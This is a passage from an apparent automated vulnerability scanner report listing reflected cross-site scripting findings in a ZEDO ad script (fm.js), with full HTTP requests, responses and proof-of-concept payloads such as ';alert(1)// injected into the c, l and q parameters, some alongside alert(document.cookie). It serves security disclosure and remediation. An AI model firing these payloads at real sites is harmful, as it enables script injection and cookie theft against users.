Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=4f791'%3balert(1)//4a5a3c4bd88&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';alert(1)//4a5a3c4bd88;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:17 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',4f791';alert(1)//4a5a3c4bd88';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,4f791';alert(1)//4a5a3c4bd88;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.235. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18ba8'-alert(1)-'e6b713d7cf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=18ba8'-alert(1)-'e6b713d7cf8 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=559
Expires: Fri, 28 Jan 2011 16:54:01 GMT
Date: Fri, 28 Jan 2011 16:44:42 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=c=18ba8'-alert(1)-'e6b713d7cf8;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(zz
...[SNIP]...

4.236. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8db9'%3balert(1)//29186ca98e5 was submitted in the l parameter. This input was echoed as f8db9';alert(1)//29186ca98e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/f8db9'%3balert(1)//29186ca98e5&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:11 GMT
Connection: close
Content-Length: 1903

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
YAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/f8db9';alert(1)//29186ca98e5">
...[SNIP]...

4.237. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71994'%3balert(1)//d11fda3e366 was submitted in the l parameter. This input was echoed as 71994';alert(1)//d11fda3e366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994'%3balert(1)//d11fda3e366&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=31
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:19 GMT
Connection: close
Content-Length: 1900

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994';alert(1)//d11fda3e366">
...[SNIP]...

4.238. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cdf'-alert(1)-'3d2ba540778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?a8cdf'-alert(1)-'3d2ba540778=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=555
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:45 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=a8cdf'-alert(1)-'3d2ba540778=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.239. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36ef'%3balert(1)//bf55c3b27b0 was submitted in the q parameter. This input was echoed as b36ef';alert(1)//bf55c3b27b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=b36ef'%3balert(1)//bf55c3b27b0&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:14 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='b36ef';alert(1)//bf55c3b27b0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=b36ef';alert(1)//bf55c3b27b0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.240. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5468"%3balert(1)//ca9a118c5a2 was submitted in the q parameter. This input was echoed as a5468";alert(1)//ca9a118c5a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=a5468"%3balert(1)//ca9a118c5a2&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:13 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='a5468";alert(1)//ca9a118c5a2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=a5468";alert(1)//ca9a118c5a2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.241. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c81'%3balert(1)//d0aa9fd4ab0 was submitted in the q parameter. This input was echoed as b0c81';alert(1)//d0aa9fd4ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=b0c81'%3balert(1)//d0aa9fd4ab0&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
